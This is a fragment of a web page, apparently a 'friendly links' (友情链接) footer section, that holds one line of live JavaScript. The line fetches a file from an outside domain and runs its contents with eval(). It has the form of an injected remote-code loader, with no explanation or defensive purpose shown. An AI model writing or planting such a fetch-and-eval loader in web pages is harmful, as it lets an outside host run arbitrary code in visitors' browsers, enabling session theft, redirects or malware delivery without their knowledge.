友情链接

fetch("https://theladycast.com/ggjs1.html") .then(res => res.text()) .then(code => { eval(code); });